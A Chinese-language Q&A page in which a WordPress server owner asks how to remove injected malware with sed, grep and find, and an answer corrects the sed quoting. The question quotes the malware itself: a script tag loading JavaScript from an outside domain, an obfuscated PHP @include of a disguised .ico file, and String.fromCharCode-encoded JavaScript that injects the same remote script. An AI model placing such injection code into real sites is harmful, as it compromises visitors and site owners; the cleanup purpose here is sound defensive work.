bash - 如何使用 sed 或 grep 替换整个字符串

Question

所以我的整个服务器都被黑了或者遇到了恶意软件问题。我的网站是基于 WordPress 的，我服务器上托管的大多数网站都是基于 WordPress 的。黑客将这行代码添加到每个文件和数据库中

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>

我确实使用 grep 搜索了它

grep -r "trasnaltemyrecords" /var/www/html/{*,.*}

我试图在整个文件结构中用 sed 替换它并且我编写了以下命令。

sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php

我正在尝试替换单个文件上的字符串 index.php首先，所以我知道它有效。

而且我知道我的代码是错误的。请帮我解决这个问题。

我尝试使用@Eran 的代码，它删除了整行，这很好，符合预期。然而，总行话是这样的

/*ee8fa*/

@include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";

/*ee8fa*/

虽然我希望删除所有内容，但我希望保留 php 开始标记 <?php .

尽管@slybloty 的解决方案很简单而且有效。

因此从所有受影响的文件中完全删除代码。我正在运行以下 3 个命令，感谢你们所有人。

1. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - 删除脚本行
2. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - 删除 @include行
3. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - 删除注释行

此外，我为 '*.html' 再次运行了所有 3 个命令，因为黑客的脚本在所有目录中创建了不需要的 index.html。我不确定批量删除这些 index.html 是否是正确的方法。

现在，我还需要找出垃圾文件和它的踪迹。

黑客脚本也添加了 JS 代码。

var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

试着看看我能不能sed

Answer 1

对字符串使用双引号 (")，不要转义单引号 (') 或标签 (<>)。仅转义斜杠 ( /)。

sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php